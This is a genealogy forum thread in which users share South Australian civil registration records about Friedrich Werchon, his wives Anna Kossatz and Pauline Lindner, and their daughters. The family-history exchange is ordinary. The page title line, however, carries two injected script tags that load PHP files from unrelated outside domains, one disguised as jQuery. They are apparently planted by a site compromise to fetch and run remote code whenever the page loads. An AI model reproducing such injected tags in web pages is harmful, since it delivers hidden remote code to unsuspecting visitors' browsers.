Looking for anyone doing research on the Lindner family in Australia<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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Looking for anyone doing research on the Lindner family in Australia

Query by singum

Pauline Lindner married a Friedrich Werchon (my Great-Great Grandfather). Friedrich came from Prussia with his wife Anna Kossatz, who died within a couple of years of being in Australia. He re-married Pauline Lindner and had two or three children.
Would like to learn more about Pauline & also the children Would particularly like any photos, as I have quite a few which we would like to identify.

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by singum Profile | Research | Contact | Subscribe | Block this user
on 2015-02-20 05:41:44

singum has been a Family Tree Circles member since Oct 2012.

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by tonkin on 2015-02-20 18:55:25


Name: Ann WERCHON.
Died: 18 January 1869.
Place: Blumberg, South Australia.
Age: 42 years.
Status: Married.
Husband: Fritz WERCHON.

Ref: Registry of Deaths, South Australia. Book 34. Page 351.

by tonkin on 2015-02-20 19:25:02


Groom: Friedrich WERCHON.
Age: 45 years.
Status: Widower.
Father: Christian WERCHON.

Bride: Pauline LINDNER.
Age: 19 years.
Status: Single.
Father: Gottlieb LINDNER.

Date married: 27 October 1869.
Place: Lutheran Bethlehem Church, Blumberg, South Australia.

Ref: Registry of Marriages, South Australia. Book 81. Page 182.

You said Friedrich and Pauline had two or three children but I have been unable to locate any children for this marriage.

by tonkin on 2015-02-20 19:52:31


Name: Pauline WERCHON.
Died: 11 April 1891.
Place: Ready Swamp, South Australia.
Age: 39 years.
Status: Married.
Residence: Mount Benson, South Australia.
Husband: Frederick WERCHON.

Ref: Registry of Deaths, South Australia. Book 192. Page 495.

by singum on 2015-02-20 21:05:39

Friedrich (Fritz) & Pauline's children I have listed are:
Anna Mary dob 30/3/1879 at Robe
Hannah Mary Meena dob 17/7/1881 at listed as Lake St Clair (just outside Robe)
There is also a baby buried at Blumburg (Birdwood) whom I have come to the conclusion mist belong to Friedrich Wilhelm (Friedrich(Fritz) Son. The father is just listed as Friedrich.

Anna Mary married William Charles Pearce on 28/9/1898 at the home of Mrs Walker, Southwerk SA
Hannah Mary Meena married John George Richardson on 30/6/1909 at St Patrick's Church Adelaide
Unfortunately I have not recorded where I got this info, but it was probably from bdm. Will try and trace my journey and let you know.
Did I tell you that I am planning a Werchon family reunion next year?

by singum on 2015-02-20 21:07:30

I forgot to let you know that I know someone who is doing Pearce research, so will try and contact him again to see what he's got for the Pearce one

by tonkin on 2015-02-20 21:52:45


Name: Anna Mary WERCHON.
Born: 30 March 1879.
Place: Dingley Bell, South Australia.
Father: Frederick WERCHON.
Mother: Pauline LINHIA.

Ref: Registry of Marriages, South Australia. Book 218. Page 226.

Name: Hannah Mary Meena WHERTON.
Born: 17 July 1881.
Place: Lake St Clair, South Australia.
Father: Frederick WERCHON.
Mother: Pauline LINTNA.

Ref: Registry of Births, South Australia. Book 267. Page 242.

The spelling of Pauline's maiden put me off track.
The birth certificates may give the correct spelling.
Looks like they waited ten years before having any children.

by singum on 2015-02-21 20:45:22

Thanks for this. I have seen other interpretations of both names, as well as the Lindner. A lot of years ago, my Parents had contact with someone doing the Lindner line, but cannot find the person any more. I am about to advertise a reunion for next year, so something could come from it.
Do you have any photos of Pauline? I have several that need confirmation as we only have guesses at present.
By the way Lake St Clair is just outside Robe SA, and Dingly Dell was also an area outside Robe (Dingly Dell is also the name of the home of Adam Lindsey Gordon - the poet, which is between Pt MacDonnell & Mt. Gambier.) At first it didn't all add up to me as I was not aware of an area called Dingly Dell outside Robe, but knew the family lived there.
Are you in Victoria and connected to the Victorian family line?

by singum on 2015-02-21 20:47:17

by singum on 2015-02-21 20:59:35

I do wonder if there were more children, but were not registered or maybe died at birth?
The spelling of Lindner is probably in the transferring of data or maybe lack of literacy skills - who knows?
At this stage I have not found any more children, and I don't think the other members of the Werchon family who are doing research have found any either, but will keep the line open.

by Kez1 on 2016-05-02 03:40:20

Hi, I remember Dad talking about this (Peter Werchon)..he passed away 3 months after being diagnosed with terminal liver Cancer on 2nd December 2013. Dad was doing the Werchon family history and he told me about his grandfather I cannot remember how many "Greats" but he was Friedrich Werchon and married a Lindner. From what I recall they owned most if not all of the land now called "Birdwood". I think the story goes that the first wife, Anna, suicided from being terminally ill and then he married the maid. I thought that the Lindners were part of our family history but wasn't aware that she was the 2nd wife. I will consult with Mum as she has the family history notes however if Dad hadn't written anything...Uncle John his brother might know.
Kerry Werchon :)

by singum on 2016-05-02 20:48:05

Hi Kerry - thanks for this. Your Nanna/Grandma Pat has details of our family Reunion in October. We knew your Dad & I still miss him - great person. I wonder if Friedrich & Pauline had other children that didn't live and were not registered? I have also come to the conclusion that the baby in Birdwood belonged to Pauline & Friedrich, as the dates don't line up for it to be Friedrich Wilhelm. I know your Dad was still wondering about it just before he died. We met with him pre our holiday and he rang me while we were stillaway to tell me the awful news that he had cancer. I also have Uncle John's details and we "talk"quite often. Again - thankyou - hope to meet with you some time soon.

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